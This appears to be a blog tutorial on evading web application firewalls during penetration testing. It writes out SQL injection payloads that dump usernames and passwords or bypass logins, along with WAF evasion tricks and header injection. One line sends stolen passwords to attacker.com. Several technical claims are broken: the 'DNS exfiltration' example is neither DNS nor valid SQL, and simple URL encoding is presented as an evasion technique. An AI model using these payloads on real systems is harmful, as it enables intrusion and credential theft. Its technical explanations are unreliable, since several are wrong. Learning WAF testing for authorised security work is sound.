How to Bypass Web Application Firewalls (WAF) Like a Pro
Consider a WAF as a security guard at the entrance of a building. This guard checks every person (or request) trying to enter, ensuring no one is carrying weapons (or malicious attacks). A WAF protects websites from hackers who try to break in using tricks like SQL injection, cross-site scripting (XSS), and other cyber attacks.
But just like a smart thief might find ways to fool a security guard (like disguising as a delivery person), ethical hackers (security testers) need to learn how to bypass WAFs to test a website’s security. If a WAF can be tricked, it means it’s not doing its job properly, and security teams must improve it.
This guide explains how ethical hackers and penetration testers find ways to bypass WAFs during security testing.
How Do WAFs Work?
Before breaking through a defense, you need to understand how it works.
A WAF analyzes incoming web requests and decides whether to allow or block them. It does this in different ways:
- Signature-based WAFs – These look for known attack patterns (like famous hacker tricks) and block them.
- Behavior-based WAFs – These study normal traffic behavior and block anything unusual.
- AI-based WAFs – These use machine learning to detect new attack patterns over time.
Problem: Most WAFs only block known threats. If an attacker modifies their attack slightly, they can sometimes slip through unnoticed.
Techniques to Bypass WAFs
Below are some of the techniques:
Encoding and Obfuscation – Changing the Appearance of an Attack
Many WAFs block common hacking phrases like:
SELECT * FROM users WHERE username = 'admin'
But what if you change the way the attack looks? A WAF may not recognize it.
Example: URL Encoding
Instead of writing:
?id=1 UNION SELECT username, password FROM users
You can encode it like this:
?id=1%20UNION%20SELECT%20username,%20password%20FROM%20users
Since %20 means a space, this looks different to some WAFs but still works the same way for the database.
Other encoding tricks:
- Base64 encoding – Converts text into a different format.
- Hex encoding – Uses hexadecimal numbers instead of letters.
- Double encoding – Encoding an already encoded value.
Think of it like disguising a weapon inside a gift box. The guard (WAF) sees a gift, not a weapon!
Case Manipulation – Changing Upper and Lowercase
Some WAFs only block attacks if they match an exact pattern. But what if they only block lowercase?
Instead of writing:
SELECT * FROM users WHERE username = 'admin'
Try:
SeLeCt * fRoM users WHERE username = 'admin'
Since SQL is not case-sensitive, the database understands it, but a poorly configured WAF might miss it.
Imagine a security guard only blocking “bad guys” wearing black shirts. A smart attacker might wear white instead.
Comment Injection – Splitting the Attack
Some WAFs detect entire phrases like UNION SELECT and block them. But what if we split them?
Example:
Instead of this:
UNION SELECT username, password FROM users
Try this:
UNI/**/ON SEL/**/ECT username, password FROM users
Here, /**/ is a comment that doesn’t affect SQL but confuses the WAF.
Imagine saying a banned word in pieces: Instead of “firework,” you say “fire”...pause...“work.” The system may not recognize it!
Using JSON or XML – Hiding in Different Formats
Some websites accept JSON or XML data, but WAFs don’t always inspect these properly.
Example:
Instead of sending a normal login request:
username=admin' OR 1=1 --
Try sending it in JSON format:
{
"user": "admin' OR 1=1 --"
}
If the WAF doesn’t scan JSON, it might let this attack pass.
Think of it like sneaking into a party through the VIP entrance instead of the main gate!
Alternative SQL Syntax – Speaking a Different “Language”
Different databases understand different SQL dialects. If a WAF blocks MySQL-style attacks, try using PostgreSQL or MSSQL syntax.
Example:
Instead of:
SELECT username, password FROM users
Try this PostgreSQL trick:
SELECT username || password FROM users
Some WAFs only block specific keywords, so using different syntax may work.
Imagine a security guard blocking only English phrases. A smart attacker might switch to French!
HTTP Headers – Sneaking In Through Different Doors
Most WAFs check only URL parameters, not HTTP headers. So, try injecting attacks inside headers like:
- User-Agent
- Referer
- X-Forwarded-For
Example:
Instead of injecting in the URL:
?id=1 OR 1=1 --
Try adding it in the header:
User-Agent: ' OR 1=1 --
Some back-end systems log headers and later process them, leading to an attack bypass.
Imagine sneaking into a building disguised as a delivery worker instead of using the main entrance!
DNS Exfiltration – Sending Data Out Secretly
If an attacker can’t see results (because the WAF blocks responses), they can send stolen data to another place via DNS queries.
Example:
UNION SELECT password FROM users INTO OUTFILE 'http://attacker.com/?data=' || password
Now, the stolen data is sent to an attacker’s domain, bypassing the WAF’s filters.
Imagine whispering a secret message to someone outside the building through a walkie-talkie instead of speaking inside.
Fingerprinting the WAF – Identifying Weaknesses
Before attacking, it helps to identify the WAF in use. Tools like:
wafw00fNmap --script http-waf-detect
If you know the WAF brand, you can search for known bypass tricks online.
Think of it like researching a security guard’s habits before planning a break-in!
Conclusion – Ethical Hacking Only!
Bypassing WAFs is an important skill for ethical hackers and pen-testers to test security. But remember:
- Only test on authorised websites.
- Always report vulnerabilities to the owner.
- Never misuse these techniques for illegal activities.
With these bypass tricks, you can sharpen your penetration testing skills and help improve cybersecurity!
Stay ethical, stay smart, and hack responsibly!